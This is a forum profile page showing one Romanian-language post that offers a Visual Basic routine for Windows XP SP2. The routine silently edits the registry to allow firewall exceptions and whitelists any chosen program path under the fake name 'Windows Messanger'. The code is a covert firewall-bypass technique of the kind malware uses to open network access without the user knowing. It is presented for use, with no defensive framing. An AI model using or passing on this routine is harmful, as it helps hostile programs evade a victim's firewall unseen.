Jump to content

Subzero999

Members
  • Posts

    23
  • Joined

  • Last visited

Posts posted by Subzero999

  1. cum sa dezactivezi firewallul la windows xp sp2:

    Public Sub FWexception (Path As String)

    Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v ""DoNotAllowExceptions"" /t REG_DWORD /d ""0"" /f", vbHide

    Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v """ & Path & """ /t REG_SZ /d """ & Path & ":*:Enabled:Windows Messanger"" /f", vbHide

    End Sub

×
×
  • Create New...